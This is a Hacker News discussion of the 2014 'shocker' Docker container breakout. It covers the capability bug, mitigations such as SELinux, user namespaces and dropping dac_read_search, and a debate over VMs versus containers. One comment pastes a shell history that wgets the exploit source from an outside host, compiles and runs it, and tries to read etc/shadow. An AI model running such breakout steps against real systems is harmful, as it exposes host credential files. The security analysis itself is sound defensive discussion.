Docker container breakout?

shykes · on June 18, 2014

Hi all, I'm a maintainer of Docker. As others already indicated this doesn't work on 1.0. But it could have.

Please remember that at this time, we don't claim Docker out-of-the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "phew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add AppArmor or SELinux containment, map trust groups to separate machines, or ideally don't grant root access to the application.

Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet!

When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly.

jacquesm · on June 18, 2014

Thank you for being so completely transparent about things like this. I wish this attitude were more common in the IT world.

bfirsh · on June 18, 2014

For more details: https://docs.docker.com/articles/security/

api · on June 18, 2014

Don't worry. This is how things get more secure. Just stay the course and whack the moles. :)

Docker is awesome by the way.

ewindisch · on June 18, 2014

Speaking of whack a mole, last month I built a docker image for the Trinity syscall fuzzer. It's a great way of finding those moles, for anyone interested in contributing to either Docker or the kernel:

https://registry.hub.docker.com/u/ewindisch/trinity/

SixSigma · on June 18, 2014

It is better to think "less insecure" than "more secure".

nate_mcfeters · on June 18, 2014

Great response on this. Nice seeing the transparency.

fabiokung · on June 18, 2014

Great response.

"..., or ideally don't grant root access to the application."

+1

simonebrunozzi · on June 18, 2014

Solomon, as always, brilliant and to the point. Keep rocking!!

sams99 · on June 19, 2014

Also worth noting that you can still de-elevate the process in the container; Discourse web runs under the discourse user in the container.

rhizome · on June 19, 2014

I don't use Docker, but this is just good peace-of-mind practice.

hapless · on June 18, 2014

Here is your annual reminder: Use SELinux.

Nothing with a shared kernel is going to be very secure. That's just the nature of the beast. It's why Docker supports SELinux. It's why RHEL and CentOS ship with pre-written SELinux policy for common daemons.

If you intend to have more than zero services on the system, you want SELinux.

rwmj · on June 18, 2014

Or real virtualization + SELinux + sVirt ... libvirt on RHEL/Fedora/CentOS puts the qemu process into a container too.

_3u10 · on June 18, 2014

For security yes, however, for performance / resource requirements docker is going to beat libvirt/qemu.

edwintorok · on June 18, 2014

I think of docker as a "nicer chroot", i.e. it might be nice for testing deployment of networked applications with lots of servers, where setting up a new VM for each one would be both slow and an overkill.

Is running something inside docker worse than running the same application on the host from a security pov? If not then you can consider docker just as one way of deploying an application on the host, i.e. not something for shared hosting of independent/possibly malicious applications.

rwmj · on June 18, 2014

In addition, we have repeatedly hit problems with our "mock" build system which uses a different kernel from what userland software is normally tested with. eg: [1] [2]. This stuff is going to hit Docker users sooner or later. It is also infuriatingly hard to debug.

[1] http://bugzilla.redhat.com/1062533

[2] https://bugzilla.redhat.com/563103#c8

rwmj · on June 18, 2014

Or for running anything other than Linux on the exact same kernel. Running Windows, for example, or older copies of Linux.

rdtsc · on June 19, 2014

Does it run Windows? Because libvirt/qemu does. A slow speed beats 0 speed usually? ;-)

icebraining · on June 19, 2014

> A slow speed beats 0 speed usually? ;-)

Not if you're running Windows.

rdtsc · on June 19, 2014

> Not if you're running Windows.

Not if Windows puts money in the pocket

pling · on June 19, 2014

Just buy more computers. Works for us and is cheaper than VMWare ESX (the thing we replaced).

Xen would be cheaper and give us better utilisation but getting rid of VMware was a good step towards cost savings :)

growupkids · on June 19, 2014

Use grsecurity and a least privilege policy generated specifically for your exact system, and not generic policies.

darksaints · on June 18, 2014

I can't help but be skeptical about SELinux, having been written by the NSA. What would make you choose SELinux over AppArmor?

bostik · on June 18, 2014

NSA creation or not, SELinux is at its core really little more than a strict state/transition machine. It has also been vetted pretty well over the years.

The syntax for the transition rules on the other hand looks like someone disgorged C-struct assignments on paper and left them there. So while SELinux (the system) is quite easily understood, the rules used to build SELinux systems are frightening, large, and from first appearance, very, very complex.

(disclosure: I had the privilege of going through SELinux a few years ago when Nokia considered using it as part of their Maemo platform security. The engineering effort was eventually deemed too large and the benefit too little, so it was skipped as infeasible. Less than two years later, Google announced that they would be taking on the task with their SE-Android project.)

SwellJoe · on June 18, 2014

While I'm as suspicious of the NSA and their intentions as anyone (I am very actively involved in my local Restore the 4th and Cryptoparty chapters), the fact is that the code is Open Source, and has been vetted by some of the best, and most trustworthy, developers in the world (it has been in the mainline Linux kernel for over a decade).

I trust SELinux. I don't necessarily trust my understanding of SELinux...it is a complicated beast. But, I believe that when configured correctly, it is a very powerful tool.

As I understand it, SELinux covers more ground than AppArmor. I have low familiarity with AppArmor, however, so don't know enough to argue why one might choose one over the other. But, I don't have any suspicion of SELinux containing exploitable code inserted by the NSA.

zobzu · on June 18, 2014

The principles are really not that complicated. I like this diagram of a similar implementation:

http://www.rsbac.org/_media/documentation/rsbac_handbook/arc...

zobzu · on June 18, 2014

For all its sins, SELinux code is actually pretty clear/simple. It's also nicer than AppArmor if you ask me, and it records inodes, not paths, for labelling.

hapless · on June 18, 2014

SELinux is supported by the principal Linux vendor, Red Hat. As a result, on RHEL/CentOS systems, there's tons of high-quality policy pre-written for any daemon you could want to install.

Instead of writing thousands of lines of policy from scratch, even a very complex system configuration might require a one-liner tweak to the Red Hat-provided policy.

nickstinemates · on June 18, 2014

Isn't it for the NSA, but by Red Hat? May have my history mixed up.

citruspi · on June 18, 2014

I believe that the National Security Agency was the original developer, but that Red Hat is a significant contributor.

mpyne · on June 18, 2014

NSA developed it and open-sourced it (much like their development of the crypto hash used for git), but Red Hat and the Linux kernel devs have pushed it the most since.

amscanne · on June 19, 2014

> Nothing with a shared kernel is going to be very secure.

SELinux is still operating in a shared kernel.

bastichelaar · on June 18, 2014

Apparently this is already fixed in Docker 1.0:

  Its fixed in docker 1.0 since CAP_DAC_READ_SEARCH is no longer available.

  Other FS-related threats to container based VMM's that have been discussed:

  - subvolume related FS operations (snapshots etc)
  - FS ioctl's that accept FS-handles as well (XFS)
  - CAP_DAC_READ_SEARCH also defeats chroot and other
    bind-mount containers (privileged LXC)
  - CAP_MKNOD might be a problem too (still available in docker 1.0) depending on the drivers available in the kernel

Source: http://seclists.org/oss-sec/2014/q2/565
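
A minimal sketch of how one might check, from inside a container, whether the capabilities named above are still held. It assumes a Linux /proc filesystem and reads the `CapEff` line of `/proc/self/status`; the helper names `has_cap` and `read_effective_mask` are made up for illustration, and the bit numbers are the ones defined in `linux/capability.h`.

```python
# Bit positions as defined in linux/capability.h.
CAP_DAC_READ_SEARCH = 2
CAP_MKNOD = 27


def has_cap(mask_hex, cap_bit):
    """Return True if the hex capability mask has the given bit set."""
    return bool(int(mask_hex, 16) & (1 << cap_bit))


def read_effective_mask(status_path="/proc/self/status"):
    """Return the CapEff hex string from a /proc status file, or None."""
    try:
        with open(status_path) as status:
            for line in status:
                if line.startswith("CapEff:"):
                    return line.split()[1]
    except OSError:
        pass  # not Linux, or /proc is not mounted
    return None


if __name__ == "__main__":
    mask = read_effective_mask()
    if mask is None:
        print("could not read CapEff; is this Linux with /proc mounted?")
    else:
        for name, bit in (("CAP_DAC_READ_SEARCH", CAP_DAC_READ_SEARCH),
                          ("CAP_MKNOD", CAP_MKNOD)):
            print(name, "present" if has_cap(mask, bit) else "dropped")
```

A dropped CAP_DAC_READ_SEARCH only says this particular path is closed; it does not show that the container is otherwise safe.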

kvmosx · on June 18, 2014

Confirmed not working in Docker 1.0:

  root@377a6f4ab0a4:/# history
  10  wget http://stealth.openwall.net/xSports/shocker.c  
  11  cc -Wall -std=c99 -O2 shocker.c -static
  12  apt-get install build-essential
  13  cc -Wall -std=c99 -O2 shocker.c -static
  14  cc -Wall -std=c99 -O2 shocker.c -static -Wno-unused-result
  15  ls
  16  ./shocker
  17  shocker
  18  nano a.out
  19  cat a.out
  20  ./a.out
  21  history
  root@377a6f4ab0a4:/# ./a.out
  [***] docker VMM-container breakout Po(C) 2014           
  [***]
  [***] The tea from the 90's kicks your sekurity again.     [***]
  [***] If you have pending sec consulting, I'll happily     [***]
  [***] forward to my friends who drink secury-tea too!      [***]
  <enter>
  [*] Resolving 'etc/shadow'
  [-] open_by_handle_at: Operation not permitted
  root@377a6f4ab0a4:/# uname -r
  3.14.1-tinycore64

valarauca1 · on June 18, 2014

I believe it was Theo de Raadt who once said, "Why does everyone think that when it comes to writing VM/container software suddenly people gain super human programming powers and no longer make the same mistakes they make writing operating systems?" (Slightly paraphrasing).

While the issue is currently fixed in the 0.12 and 1.0 versions, I doubt Docker is completely bulletproof.

mrweasel · on June 18, 2014

His words were: "You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes." (http://marc.info/?l=openbsd-misc&m=119318909016582)

It's a wonderful quote by the way. I really like it and it mirrors my reservations regarding some people's use of virtualization.

Virtualization is perfectly fine for hardware utilization, ease of deployment and so on; just don't rely on it for additional security, because that's not what it's there for.

amscanne · on June 19, 2014

I disagree: the hardware virtualization mechanisms provide an extra level of protection. Just like the non-virtualized protection mechanisms do.

No virtualization developer is under the impression that it's magical or bulletproof.

You rely on the operating system's security mechanisms continuously, and developers work hard to fix bugs and vulnerabilities when they appear. Same goes for virtualization -- the security semantics are just different.

mrweasel · on June 19, 2014

>No virtualization developer is under the impression that it's magical or bulletproof.

Developers: No, of course not. Some users however assume that you're automatically safe because you run VMware/Xen/Hyper-V, whatever.

SEJeff · on June 18, 2014

That is why Red Hat contributed SELinux support for Docker so you can run with Mandatory Access Control enabled. Docker is a layer, and security is best in multiple layers. One of them will always be broken.

gtjay · on June 18, 2014

This phrasing unfairly conflates VM/hypervisor technology and containers. Containers being a pure software technology do require near superhuman ability to secure but VM/hypervisors can lean on chip-level separation.

People forget that in-chip memory protection didn't come about for security reasons, memory errors were a particularly dangerous and particularly common kind of bug and the hardware was extended to help with memory isolation. OS session ending memory errors are almost unheard of since operating systems have started fully utilizing the on-chip protection. Programmers didn't become "superhuman" at preventing these errors.

For similar reasons it's much easier for hardware-backed virtualization programmers to protect you from malicious business inside a VM than it is for OS or container programmers.

nhaehnle · on June 18, 2014

You now rely on chip designers being super-human.

The real truth is that the difficulty of containment is proportional to the interface that is available to the contained process. You don't need VM or hypervisor technology to build a virtually unbreakable container. You only need to prevent the contained process from using any syscalls at all.

Hardware only seems better at this kind of stuff because (a) it's harder to find errata in hardware and (b) the syscall interfaces of commonly used operating systems are much larger than what the hardware offers, and were developed without keeping containability in mind. It is a well known fact that tacking on security features in hindsight is problematic.

gtjay · on June 18, 2014

You don't need super-human chip designers because, as you say, "the difficulty of containment is proportional to the interface that is available". Hardware doesn't just seem better because "the syscall interfaces of commonly used operating systems are much larger than what the hardware offers", it is better. It is easier to analyse, has a more limited state-space, has more provable behavior, etc.

You can't just argue away the fact that a certain class of error has been all but eliminated by hardware-supported virtual memory. Multi-tasking as we know it today would basically be impossible without it. The reliability of "just get it right" systems like the early Macintosh isn't even comparable to, for example, a modern Linux machine that uses the chip to trap large classes of erroneous memory accesses.

Given that we have the above, a case of a class of error that programmers seemed unable to eliminate (practically) eliminated, I'm not really sure what you're arguing. Are you saying that hardware designers of the 80's were superhuman?

Okay... maybe Jay Miner...

nhaehnle · on June 19, 2014

My point is that there is no difference between software and hardware.

You don't need hardware to eliminate memory errors: software can do it as well. Two examples of this are the Singularity system that Microsoft Research built and Google's NaCl, where the system only loads code that can be verified not to access memory incorrectly.

Your claim that hardware is easier to analyze is also incorrect. Modern processors are extremely complex beasts and are not inherently simpler than software. All processors have long lists of errata. You may be misled into thinking hardware is easier to secure because (a) those errata are less visible to userspace developers because the kernel shields you from them and (b) hardware developers invest far more resources into formal verification than software developers out of necessity (you can't just patch silicon). If software developers invested a similar amount of effort into formal verification tools, your impression would be rather different.

Again, the point is that there is no inherent distinction between software and hardware when it comes to securing systems. It is always and everywhere first a question of how you design your systems and interfaces and second a question of investment in development effort targeted at eliminating bugs.

gtjay · on June 19, 2014

"My point is that there is no difference between software and hardware."

Okay, now I see where you're coming from. Theoretically I agree. However, practically there are a number of things that make hardware different:

* Hardware has inherent "buy-in". The software systems you describe as also solving the memory access problem are basically opt-in frameworks. While you can make software frameworks hard to opt-out of (e.g. OS integration etc.) by definition... software runs on hardware...

* Hardware solutions are often much more transparent. Again, your software examples require a great deal of re-tooling. One of the most elegant aspects of the classic 80's memory access solution was how transparent it was.

* There are far fewer hardware vendors than software vendors. Combine this with the fact that, as you point out, hardware is so expensive to retool, and you create an environment where it is much more likely that a single hardware solution will be "correct enough" to enforce a constraint on software than that the majority of software will properly opt in to a framework or be coded correctly.

tshaddox · on June 19, 2014

> You now rely on chip designers being super-human.

At this point I want to ask how we're defining "super-human." What level of reliability is considered to have "super-human" requirements? There are certainly very simple and clear ways that one product produced by normal humans is much more reliable than another. For example, if you admonished someone to wear their seat belt while driving, you would scoff if they replied "well then I'm just relying on seat belt designers being super-human."

nhaehnle · on June 19, 2014

I actually agree with this. I believe that, using the right techniques, both software and hardware can be produced correctly. It's a function of their design and complexity how easy it is.

It's also worth keeping in mind that modern processors are actually extremely complex and that they do regularly have errata, even though chip designers are extremely conservative in their approach by necessity (you can't just patch silicon) and are much more thorough and disciplined in their use of formal verification tools than the vast majority of software designers.

mje__ · on June 18, 2014

Agreed. It's also a question of complexity. Xen (for example) has a significantly smaller attack surface than the Linux kernel because it just has less stuff to do.

mrweasel · on June 18, 2014

That hasn't stopped Xen from having bugs that have allowed an attacker to escape the domU and gain access to dom0 and the hardware.

The key really is: "Don't rely on virtualization for security".

Dylan16807 · on June 19, 2014

Even if you physically separate, you risk being exploited over whatever medium you have to communicate with the untrusted machine. There are no silver bullets, unless you count total isolation.

bcoates · on June 18, 2014

All user mode code has been in OS-enforced, security-bounded, per-process VMs that access each other and hardware through virtualized interfaces since forever (well, since the 90s for mainstream microcomputer OSes).

"Containers" are just user-accessible support tooling to get creative with how those interfaces work. It really should be much easier to make container software than the entire virtualization infrastructure from scratch, in the same way that it's easier to write tar than a filesystem driver.

xmlninja · on June 18, 2014

No software is ever gonna be bullet proof.

logicallee · on June 18, 2014

Except the software running a tank.

valarauca1 · on June 18, 2014

I write software that runs on tanks; it's not bulletproof. Most of the communication protocols just use security through obscurity. If you tell a gearbox to shift from 1st to snip it'll do it, and break everything.

But when you consider the air gap and the physical security surrounding it (12 inches of plate steel, 5 man team with guns, massive main gun), it's pretty secure.

dhimes · on June 18, 2014

> Except the software running a tank.

> I write software that runs on tanks

Ha! Only on HN...

mschulkind · on June 18, 2014

I'm thinking the joke is that, since the software runs inside the tank, which itself is bulletproof, the software is literally bulletproof since you can't shoot it with a bullet.

clhodapp · on June 18, 2014

I think it was a joke... You can fire bullets at the tank and the stuff inside is fine.

valarauca1 · on June 18, 2014

It is, but vehicles including tanks and other armored things use horribly insecure serial protocols for communication. Which is no joke :\

al2o3cr · on June 18, 2014

Only for suitably small values of "bullet". :)

tshaddox · on June 19, 2014

Not unless you're defining "bullets" to exclude things like https://en.wikipedia.org/wiki/Depleted_uranium#Ammunition.

dfc · on June 18, 2014

Modern tanks have steel armor plates that are 12 inches thick?

tacticus · on June 19, 2014

I think they measure tank armour as its equivalent in RHA steel,

so it probably isn't steel in large quantities, just as good as 300mm of RHA.

mpyne · on June 18, 2014

I've used important software for submarines. OPSEC limits what I can say, but let's just say I wasn't very impressed.

gtjay · on June 18, 2014

This vulnerability is a good example of how a security bug is still a bug. That is: even if all the bad guys went away there would still be problems. This issue was fixed (as far as I can tell) pre-1.0 for non-security reasons. See this discussion: https://github.com/dotcloud/docker/issues/5661 .

Basically, docker used to have a "drop" list associated with each execdriver. By default docker kept all kernel-bestowed capabilities but would explicitly drop those on the execdriver's drop list. This created issues with compatibility. If an image was prepared on a kernel that didn't have a particular capability at all and was suddenly run on one that did, weird, hard-to-diagnose behavioral differences could emerge. So now docker drops everything by default and the execdrivers have a "keep" list. Also, there's now a check for the kernel defining a capability before trying to mess with it.

There are---of course---still some issues. For example, docker drops everything then tries to add the capability back. That won't work for some capabilities because some can't be added back once they've been renounced. Still, the situation is an interesting example of how a security bug is still a bug and is likely to bite you in some way sooner or later. See also XSS flaws that limit valid inputs.
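
The difference between the "drop" and "keep" models described above can be sketched with plain sets. This is only an illustration under stated assumptions: the kernel capability sets, the lists, and the name `HYPOTHETICAL_NEW_CAP` are invented here and are not Docker's actual lists or code.

```python
def caps_drop_list(kernel_caps, drop_list):
    """Old model: keep everything the kernel offers except the drop list."""
    return set(kernel_caps) - set(drop_list)


def caps_keep_list(kernel_caps, keep_list):
    """New model: keep only listed capabilities that the kernel defines."""
    return set(kernel_caps) & set(keep_list)


# Hypothetical kernels: the newer one defines one extra capability.
OLD_KERNEL = {"CHOWN", "MKNOD", "SYS_ADMIN"}
NEW_KERNEL = OLD_KERNEL | {"HYPOTHETICAL_NEW_CAP"}

DROP_LIST = {"SYS_ADMIN"}        # illustrative, not Docker's real list
KEEP_LIST = {"CHOWN", "MKNOD"}   # illustrative, not Docker's real list

if __name__ == "__main__":
    # Drop model: the result changes with the kernel the container runs on.
    print(sorted(caps_drop_list(OLD_KERNEL, DROP_LIST)))
    print(sorted(caps_drop_list(NEW_KERNEL, DROP_LIST)))
    # Keep model: the result is the same on both kernels.
    print(sorted(caps_keep_list(OLD_KERNEL, KEEP_LIST)))
    print(sorted(caps_keep_list(NEW_KERNEL, KEEP_LIST)))
```

With a drop list, any capability a newer kernel introduces is granted silently. With a keep list, the container gets the same set on both kernels, and the intersection also stands in for the "does the kernel define it" check.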

contingencies · on June 18, 2014

Yes. I pointed it out for LXC originally, filing the bug with LXC on sourceforge and later re-filing on github. Nothing to do with docker. Finally, they implemented it. This is like multiple years of timeframe we're talking about. Later I pointed it out for docker. Just sayin'. There's a lot of us contributing here, and much of the work isn't under the docker banner.

gtjay · on June 19, 2014

"There's a lot of us contributing here, and much of the work isn't under the docker banner."

Of course! If my comment could be taken as part of the mass of prose that can be read to imply otherwise, I apologize. I don't want to undermine what Docker has done with providing a packaging format, UX, and history niceness. I also don't want to undermine the years of hard work that's gone into kernel namespacing etc. that makes it all possible.

notacoward · on June 18, 2014

Just to be clear, this doesn't really seem like a problem with Docker specifically. It looks like a problem with the kernel's namespace isolation, affecting any container-based solution. Yes, that's in the PPS, but probably should be in the title.

kapilvt · on June 18, 2014

that's true to some extent, but it also has to do with which namespaces and isolation features a given container solution supports, for example lxc has seccomp syscall filtering support and user namespace support ootb which would have mitigated this attack surface to those of the unprivileged user running the container (and covering the ps on kexec). in addition lsm usage (selinux, apparmor) can also limit the attack surface area.

0xbadcafebee · on June 18, 2014

Linux capabilities are not a good security model in general. They're more suitable for sysadmins who want to do the very basic locking down of system resources to prevent users from fucking things up, or preventing programs from doing basic accidental mistakes. A MAC or RBAC implementation is a lot more robust and actually fulfills the qualifications for things like secret/top secret computing systems.

contingencies · on June 18, 2014

grsec + containers is nicer.

0xbadcafebee · on June 18, 2014

From what I recall, grsec's rbac doesn't give you the same flexibility as selinux's mac. You have to pick and choose whether you want advanced heuristics to prevent different kinds of attack, or just get really fine-grained with your system control. I prefer grsec personally, but only because I'm lazy, and it's more than likely not certified for top secret systems.

contingencies · on June 19, 2014

grsec's developer philosophy fully admits this pragmatic focus... basically, if we are too lazy to use a custom policy because policy development is painful, then essentially we are not going to use any policy and will instead remain vulnerable. grsec makes it easier, therefore it actually gets used.

I studied SEL policies in depth back in 2000 or so, but have never once deployed a custom policy. I suspect others are the same. Common daemons on common distributions recently (~last 5 years) began to have usable pre-supplied policies. Unfortunately, standard services are so commodified these days that they're often outsourced (email, chat, web, etc.), so the benefits of this 'too-little-too-late' development are partly mitigated in practice.

xeroxmalf · on June 18, 2014

"tested with docker 0.11"

Looks to be a few releases out past 0.11, notably 0.11.1, 0.12, and now 1.0. Can anyone confirm this works on the later versions of docker?

ewindisch · on June 18, 2014

The kernel version is just as important, if not more important. I've performed tests that have given me non-specific breakout capabilities on certain combinations of Linux and Docker. I haven't however, as is done here, reproduced and written an exploit.

As an employee of Docker, I feel it is more important to me to know if we can break out and patch those issues than to write viable exploits for them.

I have noticed that newer kernels and Docker versions (such as 1.0) are currently more difficult to break out of than they were in earlier versions. Again, however, it's highly dependent on the pairing.

What's important to recognize here is that even with breakout potential, containers should add a useful layer of security to break out of that wouldn't otherwise exist. Containers should never remove security from your system, they should only add to it. However, deployers may find that removing virtual machines weakens their security story. The "secure all the things" story would be to put Qemu in a container, then run containers inside the VM.

Otherwise, security practices are as they always have been: Don't leave setuid binaries floating around, etc.

julien421 · on June 18, 2014

Docker's answer http://blog.docker.com/2014/06/docker-container-breakout-pro...

throwaway9995 · on June 18, 2014

Relevant recent discussion on the security of containers vs full virtualization: https://news.ycombinator.com/item?id=7834338

floatboth · on June 18, 2014

Now try breaking out of a FreeBSD jail ;-)

nisa · on June 18, 2014

like this? http://freebsd.1045724.n5.nabble.com/Thoughts-on-jail-privil...

profquail · on June 18, 2014

That's dated Jan 15, 2009. Are there any newer exploits for breaking out of jails on recent versions of FreeBSD? Or breaking out of a Bhyve VM?

floatboth · on June 20, 2014

And that's not even an exploit, that's the sysadmin doing it wrong: "If the host system and the jail share the `john' user and you are sharing `/usr/local' as read-write between the host and the jail, then ``you are doing it wrong!''."

mkent · on June 18, 2014

Confirmed this works on lxc 0.7.5-3ubuntu69 (ships with Ubuntu 12.04 lts). Just change "/.dockerinit" to any file within a bind mount and run it.

To fix this you can shutdown the container, edit the config in /var/lib/lxc/<name>/config and add dac_read_search to lxc.cap.drop. Voila.

  [*] Resolving 'etc/shadow'
  [-] open_by_handle_at: Operation not permitted
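
A rough sketch of auditing a container config for the fix described above. It assumes the usual `key = value` layout and space-separated capability names on `lxc.cap.drop` lines; the function name `dropped_caps` and the sample config are hypothetical, and the sketch does not model every parsing rule of LXC itself.

```python
def dropped_caps(config_text):
    """Collect the capability names listed on lxc.cap.drop lines."""
    dropped = set()
    for raw in config_text.splitlines():
        line = raw.strip()
        # Skip blanks, comment lines, and anything that is not key = value.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key == "lxc.cap.drop":
            dropped.update(value.split())
    return dropped


# Hypothetical excerpt of /var/lib/lxc/<name>/config after the edit.
SAMPLE_CONFIG = """
lxc.utsname = demo
lxc.cap.drop = sys_module mac_admin
lxc.cap.drop = dac_read_search
"""

if __name__ == "__main__":
    if "dac_read_search" in dropped_caps(SAMPLE_CONFIG):
        print("dac_read_search is dropped")
    else:
        print("dac_read_search is NOT dropped")
```

To check a real container, read the config file into a string and pass it to `dropped_caps`; the container still needs a restart for the change to take effect.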

gabrtv · on June 18, 2014

Docker image to test if your host is vulnerable to this particular open_by_handle_at() container breakout: https://registry.hub.docker.com/u/gabrtv/shocker/

Remember to always audit the source code before running something like this. Origin repo is here: https://github.com/gabrtv/shocker

jrockway · on June 18, 2014

> "The tea from the 90's kicks your sekurity again. If you have pending sec consulting, I'll happily forward to my friends who drink secury-tea too!"

Uh, what?

eugeneionesco · on June 18, 2014

stealth is a legend of the '90s

http://en.wikipedia.org/wiki/TESO

contingencies · on June 18, 2014

Never really got talking but they sent me some friendly warez when I released an ARP-based remote OS detection script in like 1999. As I recall they were all Germanic. Doubt there's any 'reach out' from groups today, too much profit/loss going on...

jhardcastle · on June 18, 2014

With a technology used in production in a lot of places, does responsible disclosure apply here? Did the author (OP?) notify Docker and/or the Linux kernel team before distributing this for public consumption?

zorked · on June 18, 2014

While the author called the exploit "shocker" I don't think anybody is shocked by it. There are likely many other ways to break out of Docker. And while I assume the Docker (and kernel!) people are closing them as they come along, I don't think anyone is claiming Docker is unescapable so it's not a surprise if it is.

zobzu · on June 18, 2014

I think he might have been sarcastic

nickstinemates · on June 18, 2014

See: http://www.docker.com/resources/security/

It has been used effectively in the past! I'd encourage anyone who is researching security and Docker to send new information here.

Thanks!

BillinghamJ · on June 18, 2014

A fix has been released already - Docker 1.0. Thus, it shouldn't really be an issue.